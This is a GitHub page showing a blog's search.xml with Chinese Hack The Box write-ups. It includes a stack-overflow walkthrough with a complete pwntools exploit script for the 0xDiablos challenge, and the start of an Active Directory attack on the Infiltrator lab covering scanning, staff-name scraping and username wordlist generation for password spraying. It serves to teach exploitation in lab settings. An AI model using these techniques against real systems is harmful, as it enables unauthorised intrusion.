-
Notifications
You must be signed in to change notification settings - Fork 0
/
search.xml
401 lines (193 loc) · 447 KB
/
search.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>HTB-You know 0xDiablos</title>
<link href="/2024/09/07/HTB-You%20know%200xDiablos/"/>
<url>/2024/09/07/HTB-You%20know%200xDiablos/</url>
<content type="html"><![CDATA[<h1 id="引言"><a href="#引言" class="headerlink" title="引言"></a>引言</h1><ul><li><strong>项目概述</strong>:HTB的EASY难度 PWN靶机 You know 0xDiablos <a href="https://app.hackthebox.com/challenges/106">https://app.hackthebox.com/challenges/106</a> 本文详细解释了溢出payload的结构以及为什么要这样构造,友好的为想要入手PWN的朋友解释了原理</li><li><strong>技术点涉及</strong>: 32位linux逆向、32位程序调用、栈溢出</li><li><strong>目标与读者</strong>:网络安全兴趣爱好者、PWN新手</li></ul><h1 id="基本情况"><a href="#基本情况" class="headerlink" title="基本情况"></a>基本情况</h1><p>运行看看</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">└─$ ./vuln </span><br><span class="line">You know who are 0xDiablos: </span><br><span class="line">aaaa</span><br><span class="line">aaaa</span><br></pre></td></tr></table></figure><p>输入啥,就吐出啥</p><p>使用checksec查一下保护</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">─$ checksec vuln </span><br><span class="line">[*] '/home/att/htb/Youknow0xDiablos/vuln'</span><br><span class="line"> Arch: i386-32-little</span><br><span class="line"> RELRO: Partial RELRO</span><br><span class="line"> Stack: No canary found</span><br><span class="line"> NX: NX unknown - GNU_STACK missing</span><br><span class="line"> PIE: No PIE (0x8048000)</span><br><span class="line"> Stack: Executable</span><br><span class="line"> RWX: Has RWX segments</span><br></pre></td></tr></table></figure><p>意思是没有任何保护,实实在在的新手题,可以更聚焦栈溢出的核心原理</p><h1 id="逆向分析"><a href="#逆向分析" class="headerlink" title="逆向分析"></a>逆向分析</h1><p>将程序放到IDA分析</p><p><img src="https://gcore.jsdelivr.net/gh/bilibiliganb/mypic/img20240907192543.png"></p><p>主函数中发现一个叫做vuln的函数<br>应该就是目标了<br><img src="https://gcore.jsdelivr.net/gh/bilibiliganb/mypic/img20240907192819.png"><br><code>gets()</code>很标准的高危函数</p><p>这里有个数组s距离ebp B8H<br>gets(s),那么就可以利用这个s数组进行溢出<br><code>junk = b'a'*0xB8</code></p><p>想象下,我们输入了大量垃圾内容,从栈的某个位置一直写到栈的底部,栈底指针EBP指向的是父函数的EBP值,然后EBP+0x4的位置就是存放的当前函数的返回地址(父函数调用当前函数后的下一行指令地址)<br>是不是多写点就可以改变函数的运行</p><p>那么攻击载荷就可以这样大致构建了<br><code>payload = junk + ebp+ret</code><br><img src="https://gcore.jsdelivr.net/gh/bilibiliganb/mypic/img20240907213154.png"><br>很明显,是要我去分析那个flag函数<br><img src="https://gcore.jsdelivr.net/gh/bilibiliganb/mypic/img20240907201336.png"><br>flag函数打开了flag.txt,如果两个参数比较成功就会返回读取的值<br>就是说我还得在栈中构建好两个参数<br>最终的攻击载荷大致就是这个结构<br><code>payload = junk + ebp+ret + ret2 + arg1 + arg2</code></p><h2 id="call逻辑讲解"><a href="#call逻辑讲解" class="headerlink" title="call逻辑讲解"></a>call逻辑讲解</h2><p>这里来讲解下为什么要这么构建payload<br>由于IDA F5是变成了伪C代码,所以调用约定是C的调用约定<br>32位程序,参数从右至左,依次入栈</p><p>正常call flag的流程如下</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">push arg2</span><br><span class="line">push arg1</span><br><span class="line"></span><br><span class="line">call flag_addr</span><br><span class="line"></span><br><span class="line">xxxcommand</span><br><span class="line"></span><br><span class="line">flag:</span><br><span class="line">/*进入函数前相当于做个这个操作,这里我是用汇编命令做比喻,而不是真的执行了这两个命令</span><br><span class="line">push ret(xxxcommand的地址)</span><br><span class="line">mov eip ,flag_addr</span><br><span class="line">*/</span><br><span class="line"></span><br><span class="line"> ; 保存返回地址</span><br><span class="line"> push ebp</span><br><span class="line"> mov ebp, esp</span><br><span class="line"></span><br><span class="line"> ; 访问第一个参数(eax)</span><br><span class="line"> mov eax, [ebp + 8]</span><br><span class="line"></span><br><span class="line"> ; 访问第二个参数(ebx)</span><br><span class="line"> mov ebx, [ebp + 12]</span><br><span class="line"></span><br><span class="line"> ; 执行函数体</span><br><span class="line"> ; ...</span><br><span class="line"></span><br><span class="line"> ; 恢复返回地址</span><br><span class="line"> mov esp, ebp</span><br><span class="line"> pop ebp</span><br><span class="line"> ret</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>而我要伪造一个call,就需要在栈里面调整好参数的站位,而且要注意我使用ret,而不是call,ret不会push一个地址进去。下面我会详细讲解为什么payload是这样构造的,结构为什么这样排列</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">正常call的栈</span><br><span class="line"></span><br><span class="line">ebp_调用flag函数的EBP指针的值(进入函数后第一个指令就是push ebp,这里打个Tab用来区分其他已有的内容)</span><br><span class="line"></span><br><span class="line">ret_addr_调用flag函数的下一行指令的地址</span><br><span class="line">arg1</span><br><span class="line">arg2</span><br></pre></td></tr></table></figure><p>而我要调用flag,就得将返回地址覆盖为flag的地址<br>大致的载荷构建结构如下</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">xxxxx垃圾数据</span><br><span class="line">+</span><br><span class="line">ebp_调用flag的父函数的ebp</span><br><span class="line">+</span><br><span class="line">flag()的地址</span><br></pre></td></tr></table></figure><p>而且flag还有参数</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">xxxxx垃圾数据</span><br><span class="line">+</span><br><span class="line">ebp_随便一个EBP地址,反正不用回主函数了</span><br><span class="line">+</span><br><span class="line">flag()函数的地址</span><br><span class="line">+</span><br><span class="line"> (这个在载荷中去掉,理由是从返回结果推导得到)ebp_随便一个EBP地址,反正不用回vuln函数了(正常call才要这个),这里是直接用的ret跳到flag()了</span><br><span class="line">+</span><br><span class="line">ret_回vuln的地址,为什么我会留下作为理解,而不是ebp,是因为实际进入flag()函数的时候,栈顶的位置就应该是返回地址而不是ebp,后面执行第一个指令`push ebp`,才会将ebp写入栈顶,而且flag()执行完毕后最终会返回到这个地址</span><br><span class="line"></span><br><span class="line">+</span><br><span class="line">arg1</span><br><span class="line">+</span><br><span class="line">arg2</span><br></pre></td></tr></table></figure><p>所以32位的paylaod像这构造</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload = junk + ebp + ret + ret2 + arg1 + arg2</span><br></pre></td></tr></table></figure><p><img src="https://gcore.jsdelivr.net/gh/bilibiliganb/mypic/img20240907204425.png"></p><p>发送payload</p><p>可以看到刚进flag函数的时候<br>栈顶的值是这样,这时候还没有执行<code>push ebp</code>,说明如果这是正常的call的话,这里存放的应该是调用flag()的下一行指令的地址,也就是flag()执行完毕后需要返回的地址,这里的ebp的值是<code>0x62626262</code>是因为<code>ebp=b'b'*4</code>,我随便写的四个b在哪里占位置</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0xffce8ac0: 0xdeadbeef63636363 </span><br></pre></td></tr></table></figure><p>完整的poc如下</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">target=<span class="string">'./vuln'</span></span><br><span class="line"><span class="comment"># context.binary指定了目标程序后,例如pack就可以自动根据目标是多少位来打包</span></span><br><span class="line"></span><br><span class="line">context.binary = target</span><br><span class="line">e = ELF(target)</span><br><span class="line"><span class="comment"># 远程连接</span></span><br><span class="line">r=remote(<span class="string">'83.136.253.163'</span>, <span class="number">37682</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 本地执行</span></span><br><span class="line"><span class="comment"># r=process(target)</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 本地调用gdb进行调试</span></span><br><span class="line"><span class="comment"># r=gdb.debug(target)</span></span><br><span class="line">junk=<span class="string">b'a'</span>*<span class="number">0xB8</span></span><br><span class="line">ebp=<span class="string">b'b'</span>*<span class="number">4</span></span><br><span class="line">ret=<span class="number">0x080491E2</span></span><br><span class="line">ret2=<span class="string">b'c'</span>*<span class="number">4</span></span><br><span class="line">arg1=<span class="number">0xDEADBEEF</span></span><br><span class="line">arg2=<span class="number">0xC0DED00D</span></span><br><span class="line"><span class="comment"># pack 根据context.binary的环境来打包,这里由于是32位可执行文件,所以这里的pack可以视同为p32,打包为32位小端字节序</span></span><br><span class="line">payload=junk+ebp+pack(ret)+ret2+pack(arg1)+pack(arg2)</span><br><span class="line"><span class="comment"># print(payload)</span></span><br><span class="line">tmp=r.sendlineafter(<span class="string">b'You know who are 0xDiablos:'</span>, payload)</span><br><span class="line"><span class="comment"># 转化为交互式,就不用一直print输出的值了</span></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>]]></content>
<categories>
<category> hack-the-box </category>
</categories>
<tags>
<tag> HTB </tag>
<tag> 栈溢出 </tag>
</tags>
</entry>
<entry>
<title>HTB-Infiltrator</title>
<link href="/2024/09/07/HTB-Infiltrator/"/>
<url>/2024/09/07/HTB-Infiltrator/</url>
<content type="html"><![CDATA[<h1 id="引言"><a href="#引言" class="headerlink" title="引言"></a>引言</h1><ul><li><strong>项目概述</strong>:hack the box的赛季靶机Infiltrator,难度Insane,竟恐怖如斯。本文带你轻松愉悦的感受顶级难度的靶机之旅。由于域渗透过程详细,可以说一文带你走进域渗透。</li><li><strong>技术点涉及</strong>: 端口扫描、域渗透准备工作、WEB渗透、用户名信息搜集以及字典构造、密码喷射、Kerberos、HASH破解、bloodhound、权限维持、提权、mysql读取任意文件、mysq写入文件、未知路径猜测、PHP命令执行</li><li><strong>目标与读者</strong>:网络安全兴趣爱好者、红队选手</li></ul><h1 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-05 21:00 EDT</span><br><span class="line">Nmap scan report for 10.10.11.31</span><br><span class="line">Host is up (0.38s latency).</span><br><span class="line">Not shown: 65511 filtered tcp ports (no-response)</span><br><span class="line">PORT STATE SERVICE</span><br><span class="line">53/tcp open domain</span><br><span class="line">80/tcp open http</span><br><span class="line">88/tcp open kerberos-sec</span><br><span class="line">135/tcp open msrpc</span><br><span class="line">139/tcp open netbios-ssn</span><br><span class="line">389/tcp open ldap</span><br><span class="line">445/tcp open microsoft-ds</span><br><span class="line">464/tcp open kpasswd5</span><br><span class="line">593/tcp open http-rpc-epmap</span><br><span class="line">636/tcp open ldapssl</span><br><span class="line">3268/tcp open globalcatLDAP</span><br><span class="line">3269/tcp open globalcatLDAPssl</span><br><span class="line">3389/tcp open ms-wbt-server</span><br><span class="line">5985/tcp open wsman</span><br><span class="line">9389/tcp open adws</span><br><span class="line">15220/tcp open unknown</span><br><span class="line">15230/tcp open unknown</span><br><span class="line">49667/tcp open unknown</span><br><span class="line">49690/tcp open unknown</span><br><span class="line">49691/tcp open unknown</span><br><span class="line">49694/tcp open unknown</span><br><span class="line">49723/tcp open unknown</span><br><span class="line">49746/tcp open unknown</span><br><span class="line">49879/tcp open unknown</span><br><span class="line"></span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 170.18 seconds</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>详细扫描</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br></pre></td><td class="code"><pre><span class="line"># Nmap 7.94SVN scan initiated Thu Sep 5 21:03:50 2024 as: nmap -sT -Pn -sV -sC -O -p53,80,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,15220,15230,49667,49690,49691,49694,49723,49746,49879 -oA nmapscan/detail 10.10.11.31</span><br><span class="line">Nmap scan report for 10.10.11.31</span><br><span class="line">Host is up (0.72s latency).</span><br><span class="line"></span><br><span class="line">PORT STATE SERVICE VERSION</span><br><span class="line">53/tcp open domain Simple DNS Plus</span><br><span class="line">80/tcp open http Microsoft IIS httpd 10.0</span><br><span class="line">|_http-title: Infiltrator.htb</span><br><span class="line">| http-methods: </span><br><span class="line">|_ Potentially risky methods: TRACE</span><br><span class="line">|_http-server-header: Microsoft-IIS/10.0</span><br><span class="line">88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-06 00:53:54Z)</span><br><span class="line">135/tcp open msrpc Microsoft Windows RPC</span><br><span class="line">139/tcp open netbios-ssn Microsoft Windows netbios-ssn</span><br><span class="line">389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)</span><br><span class="line">|_ssl-date: 2024-09-06T00:57:50+00:00; -10m07s from scanner time.</span><br><span class="line">| ssl-cert: Subject: </span><br><span class="line">| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR</span><br><span class="line">| Not valid before: 2024-08-04T18:48:15</span><br><span class="line">|_Not valid after: 2099-07-17T18:48:15</span><br><span class="line">445/tcp open microsoft-ds?</span><br><span class="line">464/tcp open kpasswd5?</span><br><span class="line">593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0</span><br><span class="line">636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)</span><br><span class="line">| ssl-cert: Subject: </span><br><span class="line">| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR</span><br><span class="line">| Not valid before: 2024-08-04T18:48:15</span><br><span class="line">|_Not valid after: 2099-07-17T18:48:15</span><br><span class="line">|_ssl-date: 2024-09-06T00:57:49+00:00; -10m07s from scanner time.</span><br><span class="line">3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)</span><br><span class="line">|_ssl-date: 2024-09-06T00:57:51+00:00; -10m07s from scanner time.</span><br><span class="line">| ssl-cert: Subject: </span><br><span class="line">| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR</span><br><span class="line">| Not valid before: 2024-08-04T18:48:15</span><br><span class="line">|_Not valid after: 2099-07-17T18:48:15</span><br><span class="line">3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)</span><br><span class="line">| ssl-cert: Subject: </span><br><span class="line">| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR</span><br><span class="line">| Not valid before: 2024-08-04T18:48:15</span><br><span class="line">|_Not valid after: 2099-07-17T18:48:15</span><br><span class="line">|_ssl-date: 2024-09-06T00:57:49+00:00; -10m07s from scanner time.</span><br><span class="line">3389/tcp open ms-wbt-server Microsoft Terminal Services</span><br><span class="line">| rdp-ntlm-info: </span><br><span class="line">| Target_Name: INFILTRATOR</span><br><span class="line">| NetBIOS_Domain_Name: INFILTRATOR</span><br><span class="line">| NetBIOS_Computer_Name: DC01</span><br><span class="line">| DNS_Domain_Name: infiltrator.htb</span><br><span class="line">| DNS_Computer_Name: dc01.infiltrator.htb</span><br><span class="line">| DNS_Tree_Name: infiltrator.htb</span><br><span class="line">| Product_Version: 10.0.17763</span><br><span class="line">|_ System_Time: 2024-09-06T00:57:05+00:00</span><br><span class="line">| ssl-cert: Subject: commonName=dc01.infiltrator.htb</span><br><span class="line">| Not valid before: 2024-07-30T13:20:17</span><br><span class="line">|_Not valid after: 2025-01-29T13:20:17</span><br><span class="line">|_ssl-date: 2024-09-06T00:57:49+00:00; -10m08s from scanner time.</span><br><span class="line">5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)</span><br><span class="line">|_http-server-header: Microsoft-HTTPAPI/2.0</span><br><span class="line">|_http-title: Not Found</span><br><span class="line">9389/tcp open mc-nmf .NET Message Framing</span><br><span class="line">15220/tcp open unknown</span><br><span class="line">15230/tcp open unknown</span><br><span class="line">49667/tcp open msrpc Microsoft Windows RPC</span><br><span class="line">49690/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0</span><br><span class="line">49691/tcp open msrpc Microsoft Windows RPC</span><br><span class="line">49694/tcp open msrpc Microsoft Windows RPC</span><br><span class="line">49723/tcp open msrpc Microsoft Windows RPC</span><br><span class="line">49746/tcp open msrpc Microsoft Windows RPC</span><br><span class="line">49879/tcp open msrpc Microsoft Windows RPC</span><br><span class="line">Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port</span><br><span class="line">Device type: general purpose</span><br><span class="line">Running (JUST GUESSING): Microsoft Windows 2019 (88%)</span><br><span class="line">Aggressive OS guesses: Microsoft Windows Server 2019 (88%)</span><br><span class="line">No exact OS matches for host (test conditions non-ideal).</span><br><span class="line">Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows</span><br><span class="line"></span><br><span class="line">Host script results:</span><br><span class="line">| smb2-security-mode: </span><br><span class="line">| 3:1:1: </span><br><span class="line">|_ Message signing enabled and required</span><br><span class="line">|_clock-skew: mean: -10m07s, deviation: 0s, median: -10m07s</span><br><span class="line">| smb2-time: </span><br><span class="line">| date: 2024-09-06T00:57:10</span><br><span class="line">|_ start_date: N/A</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>整理结果<br>端口</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">53,80,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,15220,15230,49667,49690,49691,49694,49723,49746,49879</span><br></pre></td></tr></table></figure><p>域名</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">infiltrator.htb</span><br></pre></td></tr></table></figure><p>主机</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dc01.infiltrator.htb</span><br></pre></td></tr></table></figure><h1 id="域渗透准备工作"><a href="#域渗透准备工作" class="headerlink" title="域渗透准备工作"></a>域渗透准备工作</h1><p>配置dnsserver</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo vim /etc/resolv.conf</span><br></pre></td></tr></table></figure><p>添加目标机器为dns服务器</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">└─$ cat /etc/resolv.conf </span><br><span class="line"># Generated by NetworkManager</span><br><span class="line">nameserver 10.10.11.31</span><br><span class="line">nameserver 192.168.122.1</span><br></pre></td></tr></table></figure><p>检查解析结果</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">└─$ nslookup dc01.infiltrator.htb</span><br><span class="line">Server: 10.10.11.31</span><br><span class="line">Address: 10.10.11.31#53</span><br><span class="line"></span><br><span class="line">Name: dc01.infiltrator.htb</span><br><span class="line">Address: 10.10.11.31</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>解析成功,证明dns服务器配置完成,虽然配置<code>/etc/hosts</code>也可以做到<br>但是,遇到大型目标还是乖乖配置dns服务器为好</p><h1 id="WEB渗透"><a href="#WEB渗透" class="headerlink" title="WEB渗透"></a>WEB渗透</h1><p>80端口<br>发现有个团队介绍<br><img src="https://gcore.jsdelivr.net/gh/bilibiliganb/mypic/img20240906094111.png"></p><p>使用xpath提取<br>#curl #xpath</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -s http://dc01.infiltrator.htb | xmllint --html --xpath "//div/div/h4" - </span><br></pre></td></tr></table></figure><p>复制需要的部分写入到tmp文件</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><h4>.01 David Anderson</h4></span><br><span class="line"><h4>.02 Olivia Martinez</h4></span><br><span class="line"><h4>.03 Kevin Turner</h4></span><br><span class="line"><h4>.04 Amanda Walker</h4></span><br><span class="line"><h4>.05 Marcus Harris</h4></span><br><span class="line"><h4>.06 Lauren Clark</h4></span><br><span class="line"><h4>.07 Ethan Rodriguez</h4></span><br></pre></td></tr></table></figure><p>awk切分tmp文件为自己要的部分</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">awk -F'>|<' '{print substr($3,5)}' tmp > username</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">└─$ cat username </span><br><span class="line">David Anderson</span><br><span class="line">Olivia Martinez</span><br><span class="line">Kevin Turner</span><br><span class="line">Amanda Walker</span><br><span class="line">Marcus Harris</span><br><span class="line">Lauren Clark</span><br><span class="line">Ethan Rodriguez</span><br></pre></td></tr></table></figure><p>很nice</p><h1 id="SMB渗透"><a href="#SMB渗透" class="headerlink" title="SMB渗透"></a>SMB渗透</h1><p>现在需要确认目标系统的账号</p><p>一般登录域用户的账号是长这个样子</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username@xxxx.com</span><br></pre></td></tr></table></figure><p>#awk #生成域用户字典 </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">awk ' </span><br><span class="line"> {</span><br><span class="line"> name = $0</span><br><span class="line"> split(name, parts, " ")</span><br><span class="line"> first = tolower(parts[1])</span><br><span class="line"> last = tolower(parts[2])</span><br><span class="line"> print first "." last "@infiltrator.htb"</span><br><span class="line"> print first "_" last "@infiltrator.htb"</span><br><span class="line"> print substr(first, 1, 1) "." last "@infiltrator.htb"</span><br><span class="line"> print substr(first, 1, 1) "_" last "@infiltrator.htb"</span><br><span class="line"> }</span><br><span class="line">' username > AD_username</span><br></pre></td></tr></table></figure><p>现在需要取碰撞那些用户存在了</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span 